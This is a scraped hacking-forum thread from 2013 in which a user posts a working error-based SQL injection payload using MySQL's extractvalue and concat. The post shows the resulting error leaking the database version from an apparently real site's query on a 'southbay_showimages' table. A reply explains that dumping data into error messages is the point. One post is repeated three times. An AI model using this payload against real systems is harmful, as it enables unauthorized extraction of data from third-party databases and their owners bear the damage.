Eleven Years of Service
Posts: 40
Threads: 2
Points: 0€
RE: Error-Based sql injection (a "new" approach) 10-21-2013, 01:50 PM
#11
i found it
its code working fine
Code:
and extractvalue(null,concat(0x2a,(select version())))
An internal error has occured.
Code:
XPATH syntax error: '5.1.70-log'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select version())))
mistakes are sometimes the best memories
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
•
Eleven Years of Service
Posts: 40
Threads: 2
Points: 0€
RE: Error-Based sql injection (a "new" approach) 10-23-2013, 10:04 AM
#15
(10-23-2013, 10:01 AM)shp0ngl3 Wrote: @EgyptGhost That's the idea here. You dump the data into the error message
Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
i know i understand that now thanks man for idea
mistakes are sometimes the best memories
•
Eleven Years of Service
Posts: 40
Threads: 2
Points: 0€
RE: Error-Based sql injection (a "new" approach) 10-23-2013, 10:04 AM
#16
(10-23-2013, 10:01 AM)shp0ngl3 Wrote: @EgyptGhost That's the idea here. You dump the data into the error message
Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
i know i understand that now thanks man for idea
mistakes are sometimes the best memories
•
Eleven Years of Service
Posts: 40
Threads: 2
Points: 0€
RE: Error-Based sql injection (a "new" approach) 10-23-2013, 10:04 AM
#17
(10-23-2013, 10:01 AM)shp0ngl3 Wrote: @EgyptGhost That's the idea here. You dump the data into the error message
Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
i know i understand that now thanks man for idea
mistakes are sometimes the best memories
•
